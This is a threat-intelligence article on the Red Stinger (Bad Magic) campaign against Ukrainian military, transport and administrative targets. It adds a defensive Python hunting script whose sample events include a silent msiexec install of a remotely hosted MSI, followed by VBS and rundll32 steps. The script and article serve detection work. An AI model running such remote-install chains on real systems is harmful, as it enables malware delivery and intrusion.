The Malwarebytes Threat Intelligence Team has disclosed an attack campaign targeting Eastern Ukraine. The security firm tracks the threat actor under the internal codename Red Stinger. In February, Kaspersky published details about the same actor under a different name, Bad Magic.
An undetected Red Stinger operation
The recent Malwarebytes report found that these attacks have been ongoing since 2020 and remained undetected until September 2022.
The attacks have targeted military, transportation, and critical infrastructure entities across Ukraine.
Kaspersky analyzed one of the attacks by Red Stinger in March that used the PowerMagic backdoor and CommonMagic framework. However, this was not the only attack performed by the group, and several other tools stayed hidden.
Recent findings revealed that the attacks involved different tools and malware such as DBoxShell, SolarTools, Ntinit, Ntuser, Ngrok, Rsockstun, ListFiles, SysInfo, ListVars, InstallNewPZZ, Ld_dll_loader, and StartRevSocks.
Attack timeline
The First Operation was performed in December 2020. The infection chain started with an MSI file downloaded from a URL; the MSI executed a VBS file, which in turn ran a .dll file.
The Second Operation (April 2021) used a zip file named RESOLUTION No 583-НС[.]zip. The method of propagation of this file remains unknown; however, the lure was Luhansk-themed.
The experts have very little information regarding the Third Operation (September 2021). Based on TTPs, they found techniques overlapping with both the previous and the subsequent operations.
In the Fourth Operation (February 2022), the group used a malicious MSI file that contained a PDF, a VBS file, and a data file. The .vbs file runs the .dat file, which contains a small loader and the DBoxShell backdoor.
The Fifth Operation (March 2023) used malicious LNK files pointing to remotely hosted malicious MSI files, which were downloaded and run by the Windows Installer executable (msiexec.exe).
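The infection chains above share a small set of process relationships that a defender can hunt for: msiexec.exe installing a package from a remote URL (Fifth Operation), a script host spawned by msiexec.exe (First and Fourth Operations), and a DLL loader spawned by that script host (First Operation). The following is an added example of that detection logic, written for this page and not code from Malwarebytes or Kaspersky. It runs over constructed, Sysmon Event ID 1-like process-creation records; the field names, the sample paths and the placeholder URL are assumptions made for the example.

```python
"""Hunt rules for the Red Stinger / Bad Magic MSI-based infection chains.

Rules (keyed to the operations described in the article):
  remote_msi_install : msiexec.exe asked to install a package from an http(s) URL
                       (Fifth Operation: LNK -> remotely hosted MSI run by Windows Installer)
  msi_spawns_script  : wscript.exe / cscript.exe launched by msiexec.exe
                       (First and Fourth Operations: MSI executes a VBS file)
  script_loads_dll   : rundll32.exe / regsvr32.exe launched by a script host
                       (First Operation: VBS file runs a DLL)
Input records are a constructed, Sysmon Event ID 1-like shape; field names are an assumption.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return the name of the first matching hunt rule, or None if the event is not suspicious."""
    img = _basename(ev.image)
    parent = _basename(ev.parent_image)
    if img == "msiexec.exe" and REMOTE_URL.search(ev.command_line):
        return "remote_msi_install"
    if img in SCRIPT_HOSTS and parent == "msiexec.exe":
        return "msi_spawns_script"
    if img in DLL_LOADERS and parent in SCRIPT_HOSTS:
        return "script_loads_dll"
    return None


def detect(events: Iterable[ProcessEvent]) -> List[Tuple[int, str]]:
    """Run every rule over the event stream and return (pid, rule) for each hit, in input order."""
    return [(ev.pid, rule) for ev in events if (rule := classify(ev))]


# Constructed sample events: three malicious-looking steps followed by three benign ones.
SAMPLE_EVENTS = [
    # LNK handed a remote MSI to Windows Installer (Fifth Operation pattern)
    ProcessEvent(4100, r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i http://update.example.invalid/RESOLUTION.msi /qn",
                 r"C:\Windows\explorer.exe"),
    # MSI custom action launches the embedded VBS (First/Fourth Operation pattern)
    ProcessEvent(4104, r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\Public\Documents\setup.vbs",
                 r"C:\Windows\System32\msiexec.exe"),
    # VBS loads the dropped DLL via rundll32 (First Operation pattern)
    ProcessEvent(4110, r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Public\Documents\core.dll,Start",
                 r"C:\Windows\System32\wscript.exe"),
    # Benign: the Windows Installer service starting itself
    ProcessEvent(5000, r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /V",
                 r"C:\Windows\System32\services.exe"),
    # Benign: a local MSI install with no remote URL
    ProcessEvent(5001, r"C:\Windows\System32\msiexec.exe",
                 r"msiexec.exe /i C:\Temp\app.msi", r"C:\Windows\explorer.exe"),
    # Benign: a logon script run directly from Explorer
    ProcessEvent(5002, r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe \\fileserver\netlogon\logon.vbs", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The parent/child relationships are the signal, not the file names: msiexec.exe does legitimately run custom actions and administrators do install packages over HTTP, so treat these as hunt queries to tune with an allowlist of known installers rather than as blocking rules. The Second Operation's delivery method is unknown, so no rule above covers it.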
Who are the victims?
In Operation Four, military personnel and an officer in central Ukraine were targeted.
In Operation Five, the attackers targeted workers at the Yasinovataya Administration and the DPR administration.
An advisor to the Ukrainian Central Election Commission was also targeted.
Other victims were related to the transportation ministry or equivalent, along with a library in Vinnitsya.
Conclusion
The Red Stinger APT group, also known as Bad Magic, has been actively targeting Ukrainian military and transport organizations since 2020, using a plethora of malware to remain undetected. The group has successfully carried out multiple operations, making it difficult for organizations to detect and prevent their attacks. However, the provided IOCs about this campaign may help organizations stay protected from such groups.